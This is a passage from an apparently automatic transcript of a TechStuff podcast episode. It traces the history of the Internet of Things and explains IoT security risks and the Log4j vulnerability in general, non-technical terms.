1 00:00:04,400 --> 00:00:07,800 Speaker 1: Welcome to tech Stuff, a production from I Heart Radio. 2 00:00:11,920 --> 00:00:14,560 Speaker 1: Hey there, and welcome to tech Stuff. I'm your host, 3 00:00:14,720 --> 00:00:17,680 Speaker 1: Jonathan Strickland. I'm an executive producer with iHeart Radio. And 4 00:00:17,720 --> 00:00:21,520 Speaker 1: how the tech are you all right? Way back in 5 00:00:21,800 --> 00:00:26,560 Speaker 1: nine a guy named Leonard klein Rock wrote a paper 6 00:00:26,920 --> 00:00:32,479 Speaker 1: titled information Flow in Large Communication Nets, and a lot 7 00:00:32,520 --> 00:00:36,159 Speaker 1: of folks point to this paper as laying out the 8 00:00:36,200 --> 00:00:41,879 Speaker 1: basics for what would become networked computer communications, which in 9 00:00:42,000 --> 00:00:47,080 Speaker 1: turn would evolve into the ARPA net Project, where the 10 00:00:47,800 --> 00:00:54,000 Speaker 1: basic rules for computer to computer communication were established. And 11 00:00:54,040 --> 00:00:57,160 Speaker 1: then you had things like radio based networks, you had 12 00:00:57,240 --> 00:01:01,240 Speaker 1: satellite based networks. You had these all kind of coming together. 13 00:01:02,000 --> 00:01:06,480 Speaker 1: And from that we then get an evolution into the Internet, 14 00:01:06,560 --> 00:01:10,680 Speaker 1: which is the network of networks, and that really got 15 00:01:10,680 --> 00:01:15,839 Speaker 1: its start around as different networks could finally communicate with 16 00:01:16,080 --> 00:01:20,800 Speaker 1: one another, not just within themselves, and it was because 17 00:01:20,880 --> 00:01:25,160 Speaker 1: of the establishment of common protocols. Now, many of us 18 00:01:25,880 --> 00:01:29,279 Speaker 1: out in the real world, away from all these different 19 00:01:29,319 --> 00:01:32,520 Speaker 1: research centers and government facilities and things like that, a 20 00:01:32,600 --> 00:01:36,399 Speaker 1: lot of us remain blissfully ignorant of the Internet until 21 00:01:36,520 --> 00:01:39,480 Speaker 1: you got up to the early nineties and the launch 22 00:01:39,480 --> 00:01:42,320 Speaker 1: of the World wide web. The Web was an easier 23 00:01:42,400 --> 00:01:46,440 Speaker 1: concept for most people to grasp than the larger idea 24 00:01:46,640 --> 00:01:49,520 Speaker 1: of the Internet, because you could look at the Web 25 00:01:49,520 --> 00:01:51,600 Speaker 1: and you could say, oh, it's like a magazine, but 26 00:01:51,680 --> 00:01:54,680 Speaker 1: it's on your computer. It also wasn't that different from 27 00:01:54,880 --> 00:01:59,040 Speaker 1: online service providers like a O L where you weren't 28 00:01:59,080 --> 00:02:02,200 Speaker 1: connected to an internet at large, but you were connecting 29 00:02:02,240 --> 00:02:07,279 Speaker 1: into a single network. And for a lot of people, 30 00:02:07,600 --> 00:02:10,560 Speaker 1: the Web and the Internet were synonymous, right it was 31 00:02:10,600 --> 00:02:15,079 Speaker 1: the Web was the Internet. Over time, I would say 32 00:02:15,120 --> 00:02:18,560 Speaker 1: the general public came to understand what the Internet was, 33 00:02:18,600 --> 00:02:21,399 Speaker 1: at least sort of. I mean, there's still people who 34 00:02:21,440 --> 00:02:24,160 Speaker 1: do refer to the Web as the Internet, and the 35 00:02:24,160 --> 00:02:26,360 Speaker 1: Internet is the Web and that's all there is to it. 36 00:02:26,440 --> 00:02:28,800 Speaker 1: That's not the case. The Web sits on top of 37 00:02:28,800 --> 00:02:31,760 Speaker 1: the Internet, but the Internet is more than just the Web. 38 00:02:32,320 --> 00:02:35,040 Speaker 1: But then let's get up to the late nineties. That's 39 00:02:35,040 --> 00:02:37,240 Speaker 1: when there was this guy working at Procter and Gamble 40 00:02:37,840 --> 00:02:41,160 Speaker 1: who had an idea, and he proposed using r F 41 00:02:41,240 --> 00:02:46,960 Speaker 1: I D chips on components and products for the purposes 42 00:02:47,000 --> 00:02:50,960 Speaker 1: of tracking stuff as that stuff moves through supply chain. 43 00:02:51,040 --> 00:02:53,639 Speaker 1: So an example of this might be for a microchip 44 00:02:53,720 --> 00:02:57,720 Speaker 1: that's going to go into a larger product. Maybe the 45 00:02:57,840 --> 00:03:00,799 Speaker 1: box that holds the little micro chip has an r 46 00:03:00,960 --> 00:03:03,000 Speaker 1: f I D chip on it so that you can 47 00:03:03,000 --> 00:03:05,640 Speaker 1: easily scan it as it goes from one point in 48 00:03:05,680 --> 00:03:07,600 Speaker 1: the supply chain to the next. That way, you can 49 00:03:07,680 --> 00:03:12,079 Speaker 1: keep track of where everything is throughout the entire system. 50 00:03:12,760 --> 00:03:16,280 Speaker 1: And UH, that was a neat idea, right. It's a 51 00:03:16,320 --> 00:03:19,760 Speaker 1: great way to try and keep an eye and monitor 52 00:03:19,880 --> 00:03:23,320 Speaker 1: a supply chain. Give a logistics manager the capability to 53 00:03:24,080 --> 00:03:26,639 Speaker 1: know what's going on at any given minute and respond 54 00:03:26,720 --> 00:03:30,080 Speaker 1: to it, perhaps make changes if there is a delay 55 00:03:30,120 --> 00:03:33,560 Speaker 1: at one point in the supply chain. Great idea. But 56 00:03:33,760 --> 00:03:37,960 Speaker 1: you know this guy wanted to be able to convince 57 00:03:38,120 --> 00:03:42,880 Speaker 1: his superiors to uh, to buy into this idea. So 58 00:03:42,920 --> 00:03:47,320 Speaker 1: the guy's name is Kevin Ashton, and Kevin Ashton thought 59 00:03:47,400 --> 00:03:51,520 Speaker 1: he needs kind of a sexy phrase to get his 60 00:03:51,640 --> 00:03:55,080 Speaker 1: idea sold to these these higher ups, to get them 61 00:03:55,120 --> 00:03:58,880 Speaker 1: to buy into his vision. So he called the approach 62 00:03:59,440 --> 00:04:03,880 Speaker 1: the inter net of Things. Now, Ashton was allegedly just 63 00:04:03,920 --> 00:04:06,120 Speaker 1: trying to get higher ups to support his idea for 64 00:04:06,240 --> 00:04:09,040 Speaker 1: including r F I D tags and those tags wouldn't 65 00:04:09,040 --> 00:04:12,440 Speaker 1: magically send information on their own to a network, you'd 66 00:04:12,480 --> 00:04:14,960 Speaker 1: have to scan them and everything. But it wouldn't take 67 00:04:15,000 --> 00:04:17,960 Speaker 1: long for this basic concept to evolve. And in fact, 68 00:04:18,000 --> 00:04:24,200 Speaker 1: there were previous cases where people had connected sensors to 69 00:04:24,320 --> 00:04:28,400 Speaker 1: certain devices and then connected those to a network so 70 00:04:28,480 --> 00:04:33,800 Speaker 1: that they could monitor a device remotely. There was ones 71 00:04:33,839 --> 00:04:36,680 Speaker 1: where people did that with vending machines, for example, so 72 00:04:36,720 --> 00:04:39,479 Speaker 1: that they would know when the vending machine was running 73 00:04:39,520 --> 00:04:43,120 Speaker 1: low on specific stuff that's that's, or in some cases, 74 00:04:44,279 --> 00:04:47,240 Speaker 1: so that the person who had installed it would know, Oh, 75 00:04:47,279 --> 00:04:49,560 Speaker 1: I'm not gonna bother walking down there. They're out of 76 00:04:49,640 --> 00:04:52,159 Speaker 1: dr pepper. So I'm not even gonna bother leaving my 77 00:04:52,240 --> 00:04:54,120 Speaker 1: desk because I know there's no dr pepper in the 78 00:04:54,160 --> 00:04:57,720 Speaker 1: vending machine downstairs. But it didn't take long for this 79 00:04:57,800 --> 00:05:04,200 Speaker 1: basic concept to evolve of into something more uh ambitious. 80 00:05:04,839 --> 00:05:07,400 Speaker 1: And I think it's fascinating that the phrase internet of 81 00:05:07,440 --> 00:05:11,960 Speaker 1: things actually predates the consumer smartphone era by nearly a decade, 82 00:05:12,000 --> 00:05:15,560 Speaker 1: because I think for most people, myself included that that 83 00:05:15,720 --> 00:05:20,880 Speaker 1: their awareness of the Internet of things came after smartphones 84 00:05:21,120 --> 00:05:24,520 Speaker 1: first started to really become popular among the general population. 85 00:05:24,839 --> 00:05:28,080 Speaker 1: I point to the iPhone launch in two thousand seven 86 00:05:28,560 --> 00:05:31,880 Speaker 1: as the beginning of the smartphone era. Obviously, there were 87 00:05:31,920 --> 00:05:35,599 Speaker 1: smartphones before the iPhone. Apple did not invent the smartphone, 88 00:05:36,279 --> 00:05:39,160 Speaker 1: but smartphones were kind of a niche product that we're 89 00:05:39,200 --> 00:05:43,120 Speaker 1: mostly just used by business leaders, executives, that kind of thing, 90 00:05:43,279 --> 00:05:45,839 Speaker 1: and not so much the average person. But Apple changed 91 00:05:45,839 --> 00:05:50,200 Speaker 1: all that, and then subsequently once we were all adjusting 92 00:05:50,240 --> 00:05:53,160 Speaker 1: to the idea of being able to access stuff online 93 00:05:53,240 --> 00:05:56,320 Speaker 1: through our phones in a way that was actually, you know, 94 00:05:57,160 --> 00:06:00,640 Speaker 1: fun to do and useful. Because if you ever had 95 00:06:00,720 --> 00:06:04,200 Speaker 1: a basic cell phone before the smartphone era, you know 96 00:06:04,320 --> 00:06:07,640 Speaker 1: that if you did have any web enabled services on there, 97 00:06:08,240 --> 00:06:12,680 Speaker 1: it was not good. Like it just didn't it didn't 98 00:06:12,720 --> 00:06:15,679 Speaker 1: work well, it wasn't easy to navigate in. The iPhone 99 00:06:15,760 --> 00:06:19,680 Speaker 1: changed all that. Well for me at least, my awareness 100 00:06:19,680 --> 00:06:23,440 Speaker 1: of smartphones came first, and then I later became aware 101 00:06:23,480 --> 00:06:25,760 Speaker 1: of this idea of Internet of things. But of course 102 00:06:26,160 --> 00:06:28,680 Speaker 1: the Internet of things concept had been going pretty strong 103 00:06:28,720 --> 00:06:33,960 Speaker 1: already for almost a decade. Anyway, as time would go on, 104 00:06:34,400 --> 00:06:38,520 Speaker 1: we would see more folks experiment with Internet connectivity and 105 00:06:38,600 --> 00:06:43,640 Speaker 1: everything from components like simple sensors or actuators which could 106 00:06:43,640 --> 00:06:47,880 Speaker 1: go into larger systems. So you make a tiny part 107 00:06:48,400 --> 00:06:51,800 Speaker 1: that is meant to go into something else. You make 108 00:06:51,839 --> 00:06:55,120 Speaker 1: that one part capable of connecting to a network, and 109 00:06:55,160 --> 00:06:58,039 Speaker 1: then maybe the rest of it also can, or maybe 110 00:06:58,040 --> 00:07:02,560 Speaker 1: it can all the way up to more complicated integrations 111 00:07:02,640 --> 00:07:06,279 Speaker 1: where the entire system is meant to be Internet capable, 112 00:07:06,320 --> 00:07:09,760 Speaker 1: stuff like smart TVs. Right these days, you can outfit 113 00:07:09,800 --> 00:07:12,600 Speaker 1: your home numerous smart devices that all connect to a 114 00:07:12,640 --> 00:07:17,240 Speaker 1: home network or the Internet at large. And then there's 115 00:07:17,280 --> 00:07:20,560 Speaker 1: also a growing use of Internet connected devices out in 116 00:07:20,720 --> 00:07:24,840 Speaker 1: the world just outside of your home. Everything from cars 117 00:07:25,200 --> 00:07:29,560 Speaker 1: to city infrastructure, security cameras, all sorts of stuff are 118 00:07:29,600 --> 00:07:33,880 Speaker 1: all connected into the Internet, creating this massive Internet of things. Now. 119 00:07:33,920 --> 00:07:37,360 Speaker 1: Throughout all that time, there have been security experts who 120 00:07:37,360 --> 00:07:42,520 Speaker 1: have cautioned companies and consumers about the Internet of things, 121 00:07:42,920 --> 00:07:45,320 Speaker 1: because the Internet of Things does come with it a 122 00:07:45,360 --> 00:07:49,200 Speaker 1: lot of benefits. You can see a lot of really 123 00:07:49,480 --> 00:07:52,880 Speaker 1: compelling use cases for the Internet of things, whether it's 124 00:07:52,920 --> 00:07:54,800 Speaker 1: just keeping an eye on things to make sure that 125 00:07:54,840 --> 00:08:01,760 Speaker 1: everything is working properly, to creating more convenient and lightful experiences. 126 00:08:01,760 --> 00:08:05,880 Speaker 1: But any network connected device can potentially serve as an 127 00:08:06,000 --> 00:08:12,520 Speaker 1: entry point for bad actors, for for malicious hackers, so 128 00:08:12,640 --> 00:08:18,800 Speaker 1: devices can be compromised, and that might allow a hacker 129 00:08:18,840 --> 00:08:23,400 Speaker 1: to get a foothold into say, your your home network 130 00:08:24,080 --> 00:08:29,520 Speaker 1: and search for ways to get greater access so that 131 00:08:29,560 --> 00:08:33,440 Speaker 1: they can do all sorts of stuff from stealing information 132 00:08:34,080 --> 00:08:38,640 Speaker 1: to turning your network or devices on your network into 133 00:08:38,800 --> 00:08:41,800 Speaker 1: agents that they use and things like a bot net, 134 00:08:42,679 --> 00:08:45,400 Speaker 1: or they may use it to do stuff like mine 135 00:08:45,480 --> 00:08:49,680 Speaker 1: for cryptocurrency. It's nothing like having you know, your your 136 00:08:49,760 --> 00:08:55,400 Speaker 1: web server crash because some hacker has compromised tens of 137 00:08:55,440 --> 00:08:59,240 Speaker 1: thousands of Internet connected doorbells and then directed all those 138 00:08:59,240 --> 00:09:02,800 Speaker 1: doorbells to paying your web server. That's something that can happen, 139 00:09:03,360 --> 00:09:06,720 Speaker 1: like those button nets that can do distributed denial of 140 00:09:06,760 --> 00:09:10,480 Speaker 1: service attacks or de dos attacks. It doesn't have to 141 00:09:10,520 --> 00:09:13,480 Speaker 1: be a computer like I often think of computers when 142 00:09:13,480 --> 00:09:16,880 Speaker 1: I think of de DOS attacks. But the truth is 143 00:09:17,520 --> 00:09:21,400 Speaker 1: any network connected device capable of sending a ping to 144 00:09:21,600 --> 00:09:25,120 Speaker 1: a server can potentially be part of a boton net. 145 00:09:25,600 --> 00:09:29,160 Speaker 1: So that includes a lot of devices we connect to 146 00:09:29,440 --> 00:09:33,600 Speaker 1: networks that are not computers or smartphones. And if those 147 00:09:33,679 --> 00:09:37,719 Speaker 1: devices don't have the proper security enabled on them, or 148 00:09:37,800 --> 00:09:41,320 Speaker 1: if we're really lazy and we don't bother to update 149 00:09:41,360 --> 00:09:45,280 Speaker 1: things like default passwords and user names, we can start 150 00:09:45,320 --> 00:09:50,720 Speaker 1: to create the opportunity for some pretty serious mischief. Then, 151 00:09:50,840 --> 00:09:54,120 Speaker 1: of course, there are the tens of thousands of devices 152 00:09:54,160 --> 00:09:57,120 Speaker 1: that have been connected to the Internet, and then subsequently 153 00:09:57,200 --> 00:10:00,800 Speaker 1: the company is responsible for the hardware or the services 154 00:10:00,800 --> 00:10:04,360 Speaker 1: that run on the hardware have stopped supporting them or 155 00:10:04,520 --> 00:10:07,800 Speaker 1: completely gone out of business. If this happens all the time, Right, 156 00:10:07,840 --> 00:10:10,600 Speaker 1: We've got all these different companies that have created Internet 157 00:10:10,679 --> 00:10:15,720 Speaker 1: of Things type devices or components for devices, and then 158 00:10:15,720 --> 00:10:20,960 Speaker 1: the company gets acquired and then effectively services are no 159 00:10:21,040 --> 00:10:25,240 Speaker 1: longer supported for some things. Well, if those devices are 160 00:10:25,280 --> 00:10:29,720 Speaker 1: still connected to networks and they're no longer actively serving 161 00:10:29,720 --> 00:10:34,440 Speaker 1: a purpose, they could potentially act as an entry point 162 00:10:34,480 --> 00:10:38,120 Speaker 1: for hackers as well, right, especially if they use default 163 00:10:38,559 --> 00:10:42,520 Speaker 1: user names and passwords, default log incredentials, because you no 164 00:10:42,559 --> 00:10:46,200 Speaker 1: longer have a company that's actually actively pushing out updates, 165 00:10:46,240 --> 00:10:49,800 Speaker 1: so there's no hope of someone sending out, say a 166 00:10:49,880 --> 00:10:56,080 Speaker 1: firmware update that requires you to change your devices log incredentials. 167 00:10:56,120 --> 00:10:59,560 Speaker 1: So if you've got these orphaned devices that are still 168 00:10:59,600 --> 00:11:03,240 Speaker 1: connect into networks, they can serve as a point of 169 00:11:03,400 --> 00:11:09,160 Speaker 1: entry for hackers. Uh, These these forgotten Internet of things devices. Uh. 170 00:11:09,320 --> 00:11:11,760 Speaker 1: In some cases, forgotten can also just mean that, oh, 171 00:11:11,840 --> 00:11:15,679 Speaker 1: you you connected this thing to your network, you forgot 172 00:11:15,720 --> 00:11:18,079 Speaker 1: you did it, you haven't used it in ages. It's 173 00:11:18,120 --> 00:11:21,320 Speaker 1: still technically connected and still active, but you're not like 174 00:11:21,800 --> 00:11:26,880 Speaker 1: constantly using it. Uh. That can potentially become a vulnerability. 175 00:11:26,920 --> 00:11:29,319 Speaker 1: This is really one of the big problems with Internet 176 00:11:29,320 --> 00:11:33,040 Speaker 1: of things in general is that the Internet of Things 177 00:11:33,240 --> 00:11:38,880 Speaker 1: as a concept depends heavily upon companies that create Internet 178 00:11:38,960 --> 00:11:44,360 Speaker 1: of things products and services remaining solvent and actively supporting them. 179 00:11:44,480 --> 00:11:46,920 Speaker 1: And if they stop supporting them, that the rest of 180 00:11:47,040 --> 00:11:50,120 Speaker 1: us take the effort to remove those devices from our 181 00:11:50,200 --> 00:11:56,079 Speaker 1: networks because they now h constitute a threat to our security. 182 00:11:56,760 --> 00:12:00,560 Speaker 1: That's something that we're not very good at doing. Yet. 183 00:12:01,679 --> 00:12:06,160 Speaker 1: I'll explain a bit about, you know, some examples of 184 00:12:06,160 --> 00:12:08,640 Speaker 1: of where that all went wrong after we come back 185 00:12:08,679 --> 00:12:20,040 Speaker 1: from this quick break. So I thought it would chat 186 00:12:20,080 --> 00:12:23,240 Speaker 1: about some of the instances where hackers were able to 187 00:12:23,480 --> 00:12:27,960 Speaker 1: exploit Internet of things devices. Uh. This isn't to warn 188 00:12:28,080 --> 00:12:33,080 Speaker 1: everyone away from IoT. It's rather to remind ourselves that 189 00:12:33,200 --> 00:12:37,679 Speaker 1: good security goes beyond resetting our router passwords or our 190 00:12:37,840 --> 00:12:42,520 Speaker 1: modem log in credentials, and that it goes beyond being 191 00:12:42,720 --> 00:12:46,640 Speaker 1: savvy with our computer security and and avoiding things like 192 00:12:46,720 --> 00:12:49,400 Speaker 1: phishing attacks and that sort of stuff. All of that 193 00:12:49,520 --> 00:12:53,079 Speaker 1: is important, and I think it still remains true that 194 00:12:53,320 --> 00:12:57,240 Speaker 1: in your typical system, the weakest point is usually the people, 195 00:12:57,920 --> 00:13:02,320 Speaker 1: not the not the systems, not components. But that doesn't 196 00:13:02,320 --> 00:13:05,719 Speaker 1: mean that all components are bulletproof. And if there are 197 00:13:05,800 --> 00:13:09,760 Speaker 1: vulnerabilities and the hacker community learns about it, that information 198 00:13:09,800 --> 00:13:13,320 Speaker 1: can spread quickly in hacker circles and it may not 199 00:13:13,480 --> 00:13:17,200 Speaker 1: get to anyone who can do anything about it until 200 00:13:17,400 --> 00:13:20,040 Speaker 1: it's too late. You know, any time we're talking about 201 00:13:20,080 --> 00:13:24,480 Speaker 1: adding components to a network, we need to think about security. 202 00:13:24,960 --> 00:13:27,600 Speaker 1: Uh do we know? I mean I've been guilty of 203 00:13:27,640 --> 00:13:29,719 Speaker 1: this too. I've added stuff to buy home network and 204 00:13:29,760 --> 00:13:33,200 Speaker 1: then later thought, oh, you know what this thing that 205 00:13:33,280 --> 00:13:36,440 Speaker 1: I just logged into, like I connected to my home network, 206 00:13:36,480 --> 00:13:38,600 Speaker 1: it has a default user name and password that I 207 00:13:38,600 --> 00:13:42,680 Speaker 1: can't change. And I bet there are people out there 208 00:13:42,720 --> 00:13:45,480 Speaker 1: who know what the default user name and password happens 209 00:13:45,520 --> 00:13:48,599 Speaker 1: to be for this particular device. I should just disconnect 210 00:13:48,600 --> 00:13:50,680 Speaker 1: this from our network and not use it. And That's 211 00:13:50,720 --> 00:13:55,840 Speaker 1: what I've done, Sometimes not immediately. Sometimes it's only after reflection. Luckily, 212 00:13:56,080 --> 00:13:58,240 Speaker 1: as far as I know anyway, I've never been the 213 00:13:58,280 --> 00:14:03,720 Speaker 1: target of a true intrusion. But it's not because I 214 00:14:03,800 --> 00:14:08,120 Speaker 1: was careful enough. It's because I was lucky. And you 215 00:14:08,200 --> 00:14:10,720 Speaker 1: can't count on that. And I'm saying this out loud 216 00:14:10,760 --> 00:14:14,360 Speaker 1: so that I remember I can't count on that. So yeah, 217 00:14:14,440 --> 00:14:17,160 Speaker 1: if we if we don't take the right steps, it's 218 00:14:17,200 --> 00:14:20,120 Speaker 1: not like I would say, we're inviting trouble, but we're 219 00:14:20,200 --> 00:14:24,120 Speaker 1: certainly going to be underprepared if trouble happens to find us. 220 00:14:24,440 --> 00:14:28,960 Speaker 1: So let's begin with a big instance of a problem 221 00:14:29,080 --> 00:14:33,160 Speaker 1: that affected not just the Internet of things, uh, category 222 00:14:33,280 --> 00:14:37,280 Speaker 1: of technology, but IoT is certainly part of it. And 223 00:14:37,320 --> 00:14:40,280 Speaker 1: it requires a bit of an explanation. So one thing 224 00:14:40,320 --> 00:14:42,720 Speaker 1: that a lot of different systems, including a lot of 225 00:14:42,720 --> 00:14:48,960 Speaker 1: IoT devices, tend to do, is log Uh. It's it's 226 00:14:49,000 --> 00:14:52,720 Speaker 1: called logging. And now I don't mean that IoT devices 227 00:14:52,720 --> 00:14:56,280 Speaker 1: are all putting on flannel and singing about being a lumberjack, 228 00:14:56,320 --> 00:15:01,040 Speaker 1: and that's okay. No. In this case, log being means 229 00:15:01,160 --> 00:15:04,600 Speaker 1: keeping a record of activity. So there are lots of 230 00:15:05,280 --> 00:15:08,680 Speaker 1: systems out there that log stuff, and that makes sense, right. 231 00:15:08,680 --> 00:15:11,760 Speaker 1: There's some systems that are designed to log something. That's 232 00:15:11,760 --> 00:15:14,800 Speaker 1: all they're meant to do. Like let's say that you've 233 00:15:14,840 --> 00:15:17,520 Speaker 1: got some environmental sensors set up in an area. They 234 00:15:17,600 --> 00:15:22,840 Speaker 1: might be intended to log changes in things like temperature. Well, 235 00:15:23,080 --> 00:15:26,880 Speaker 1: that's the whole purpose of that device. But even beyond that, 236 00:15:27,040 --> 00:15:30,800 Speaker 1: in systems that aren't primarily about logging, they typically do 237 00:15:30,960 --> 00:15:35,680 Speaker 1: have some form of logging capability. So you have Internet 238 00:15:35,680 --> 00:15:39,240 Speaker 1: devices that are part of larger systems that are tracking changes, 239 00:15:39,400 --> 00:15:44,200 Speaker 1: or you've got uh a logging system that logs performance 240 00:15:44,240 --> 00:15:46,920 Speaker 1: information so you know how well your system is performing, 241 00:15:47,040 --> 00:15:50,560 Speaker 1: is it running hot, is it efficient? You have error 242 00:15:50,600 --> 00:15:56,280 Speaker 1: logging systems so that way, whenever anything goes askew, if 243 00:15:56,320 --> 00:16:01,160 Speaker 1: something does not perform to expectations, you get a logged event. 244 00:16:01,360 --> 00:16:03,840 Speaker 1: So that way a technician can later go back and 245 00:16:03,920 --> 00:16:06,560 Speaker 1: see what the heck happened, How can we fix it 246 00:16:06,640 --> 00:16:08,640 Speaker 1: and make sure it doesn't happen again so that doesn't 247 00:16:08,640 --> 00:16:12,480 Speaker 1: interrupt service or worse, Um, you can log security status, 248 00:16:12,560 --> 00:16:16,400 Speaker 1: all sorts of things like this. Well, it's standard essentially 249 00:16:16,440 --> 00:16:19,120 Speaker 1: to have some means of logging errors, because if you 250 00:16:19,160 --> 00:16:21,680 Speaker 1: don't have a way of logging errors, then when something 251 00:16:21,680 --> 00:16:24,680 Speaker 1: goes wrong, it becomes like a murder mystery to figure 252 00:16:24,680 --> 00:16:26,960 Speaker 1: out what the heck happened? Did it in fact go 253 00:16:27,080 --> 00:16:30,880 Speaker 1: wrong or did the end user misuse the technology and 254 00:16:30,920 --> 00:16:34,680 Speaker 1: misunderstand it. So you want to have that logging feature 255 00:16:34,840 --> 00:16:37,800 Speaker 1: to to be able to diagnose problems much more quickly 256 00:16:37,840 --> 00:16:41,240 Speaker 1: and then get to a solution. One set of logging tools, 257 00:16:42,400 --> 00:16:46,840 Speaker 1: which include like a data set, a library set, that's 258 00:16:46,880 --> 00:16:51,480 Speaker 1: that's heavily used in throughout technology, comes from a company 259 00:16:51,520 --> 00:16:58,080 Speaker 1: called Apache. Jump on it. Apache used is used by 260 00:16:58,080 --> 00:17:01,360 Speaker 1: a lot of high profile systems like cloud Flare uses 261 00:17:01,760 --> 00:17:06,600 Speaker 1: Apache and cloud Flare, among other things, provides protections against 262 00:17:06,680 --> 00:17:09,800 Speaker 1: denial of service attacks um. But it's also used by 263 00:17:09,800 --> 00:17:13,240 Speaker 1: stuff like Steam and Twitter. And it had a tool 264 00:17:13,359 --> 00:17:19,960 Speaker 1: called log for J. And what wasn't really known was 265 00:17:20,040 --> 00:17:22,200 Speaker 1: that at least as far back as two thousand thirteen, 266 00:17:22,720 --> 00:17:26,040 Speaker 1: there was a vulnerability in log for J that would 267 00:17:26,040 --> 00:17:30,800 Speaker 1: allow for remote code execution or r c E. And 268 00:17:30,840 --> 00:17:33,399 Speaker 1: that is just what it sounds like. It's a feature 269 00:17:33,440 --> 00:17:36,960 Speaker 1: that lets someone run code on a point on a 270 00:17:37,040 --> 00:17:40,560 Speaker 1: system from a remote location, so you can control a 271 00:17:40,640 --> 00:17:43,600 Speaker 1: system as if you were right there with full access, 272 00:17:44,600 --> 00:17:47,600 Speaker 1: maybe not full access, but with access, so you might 273 00:17:47,640 --> 00:17:49,760 Speaker 1: actually build this into a system on purpose, Right, you 274 00:17:49,840 --> 00:17:53,879 Speaker 1: might want to have remote operators able to access a system, 275 00:17:53,880 --> 00:17:56,920 Speaker 1: but it can also be a vulnerability, like it could 276 00:17:56,960 --> 00:17:59,879 Speaker 1: be something that you've overlooked where someone has figured out 277 00:17:59,920 --> 00:18:04,080 Speaker 1: a way to execute code on a system that otherwise 278 00:18:04,160 --> 00:18:06,639 Speaker 1: they should not have access to. And that was the 279 00:18:06,680 --> 00:18:09,760 Speaker 1: problem with log for J. And you might wonder what 280 00:18:10,000 --> 00:18:13,359 Speaker 1: specifically was going on, how did this happen? What was 281 00:18:13,440 --> 00:18:15,639 Speaker 1: happening on a technical level, So I'll try to explain 282 00:18:15,680 --> 00:18:19,840 Speaker 1: it from a high high viewpoint. The log for J 283 00:18:20,080 --> 00:18:24,560 Speaker 1: tool uses a Java Naming and Directory Interface or j 284 00:18:24,800 --> 00:18:29,400 Speaker 1: n d I. So someone who was trying to take 285 00:18:29,440 --> 00:18:33,680 Speaker 1: advantage of this vulnerability and log for J would send 286 00:18:33,720 --> 00:18:37,240 Speaker 1: a special h T t P or even an HTTPS 287 00:18:37,640 --> 00:18:41,840 Speaker 1: based request to log an event, and they would target 288 00:18:41,880 --> 00:18:45,960 Speaker 1: a server and they would send this UH this request 289 00:18:46,000 --> 00:18:49,000 Speaker 1: which would include in the header a j n d 290 00:18:49,240 --> 00:18:54,639 Speaker 1: I request. So um the target server would receive this 291 00:18:54,760 --> 00:18:58,600 Speaker 1: and likely log this request as an error using log 292 00:18:58,720 --> 00:19:03,199 Speaker 1: for J. Law for J. While logging the error sees 293 00:19:03,320 --> 00:19:07,240 Speaker 1: that there's this j n d I request in the 294 00:19:07,240 --> 00:19:09,440 Speaker 1: header of the request that was sent to them, right, 295 00:19:09,880 --> 00:19:13,280 Speaker 1: And it's so essentially it reaches out to the server 296 00:19:13,760 --> 00:19:16,520 Speaker 1: that sent the request in the first place, the hackers server. 297 00:19:17,200 --> 00:19:19,040 Speaker 1: So this is kind of like someone saying, hey, can 298 00:19:19,040 --> 00:19:21,360 Speaker 1: I help you? I see that you're having some issues, 299 00:19:21,840 --> 00:19:25,720 Speaker 1: only it's a trap. As Admiral Akbar would say. The 300 00:19:25,800 --> 00:19:31,359 Speaker 1: server would then direct this request from the target. You know, 301 00:19:31,400 --> 00:19:34,119 Speaker 1: the target is saying, hey, how can I help. The 302 00:19:34,240 --> 00:19:38,480 Speaker 1: server would direct that request to a directory that would 303 00:19:38,520 --> 00:19:43,359 Speaker 1: contain malicious code, which, when the log for J system 304 00:19:43,400 --> 00:19:48,480 Speaker 1: would continue this this process would activate that malicious code, 305 00:19:48,520 --> 00:19:51,080 Speaker 1: which would then run on the log for Jay's target 306 00:19:51,119 --> 00:19:54,960 Speaker 1: system UM and would create a backdoor access point for hackers. 307 00:19:55,000 --> 00:19:58,960 Speaker 1: So if you've seen thor Ragnarok, this is the classic 308 00:19:59,400 --> 00:20:03,920 Speaker 1: get he routine. That's essentially what the log for J 309 00:20:04,760 --> 00:20:10,240 Speaker 1: vulnerability allowed hackers to do. Was it was like saying, uh, 310 00:20:10,320 --> 00:20:13,240 Speaker 1: something has gone wrong. Log for J is looking into 311 00:20:13,280 --> 00:20:16,960 Speaker 1: it and and the process gets trapped into running this 312 00:20:17,000 --> 00:20:19,600 Speaker 1: malicious code. Didn't work all the time because obviously the 313 00:20:19,640 --> 00:20:23,159 Speaker 1: server that you're targeting had to rely on log for 314 00:20:23,320 --> 00:20:25,960 Speaker 1: J in the first place for this uh this vulnerability 315 00:20:26,040 --> 00:20:30,000 Speaker 1: to be relevant. But this vulnerability and log for J 316 00:20:30,160 --> 00:20:34,480 Speaker 1: persisted in several versions. So every time Apache was sitting 317 00:20:34,480 --> 00:20:38,880 Speaker 1: on a new version of log for j This vulnerability 318 00:20:39,240 --> 00:20:41,520 Speaker 1: was kind of baked in and no one knew about it, 319 00:20:41,560 --> 00:20:45,479 Speaker 1: so it just it stayed there version after version, and 320 00:20:45,600 --> 00:20:49,119 Speaker 1: apparently no one had Apache had noticed it, and no 321 00:20:49,200 --> 00:20:52,760 Speaker 1: one outside of Apache had alerted them to it. And 322 00:20:52,840 --> 00:20:57,479 Speaker 1: that changed on December ninth, twenty one. So remember this 323 00:20:57,560 --> 00:21:01,159 Speaker 1: vulnerability may have been around since like thirteen, and it 324 00:21:01,200 --> 00:21:08,200 Speaker 1: wasn't until someone, someone outside the hacker community figured this out. 325 00:21:08,600 --> 00:21:12,280 Speaker 1: And that was when a security engineer named chen Xiao 326 00:21:12,400 --> 00:21:16,359 Speaker 1: Jun who worked at the Chinese company Ali Baba Cloud, 327 00:21:16,920 --> 00:21:20,920 Speaker 1: sent Apache a notification saying, hey, log for j has 328 00:21:20,920 --> 00:21:25,960 Speaker 1: this critical vulnerability in it. So another side note, Ali 329 00:21:26,040 --> 00:21:28,879 Speaker 1: Baba Cloud actually got into hot water for that because 330 00:21:28,880 --> 00:21:32,000 Speaker 1: the Chinese government was mightily miffed that they were not 331 00:21:32,119 --> 00:21:37,600 Speaker 1: informed of the vulnerability before Apache was told. And that 332 00:21:37,680 --> 00:21:40,320 Speaker 1: sounds a little scary. I mean, maybe they were upset 333 00:21:40,320 --> 00:21:43,119 Speaker 1: because they wanted the opportunity to address the vulnerability in 334 00:21:43,160 --> 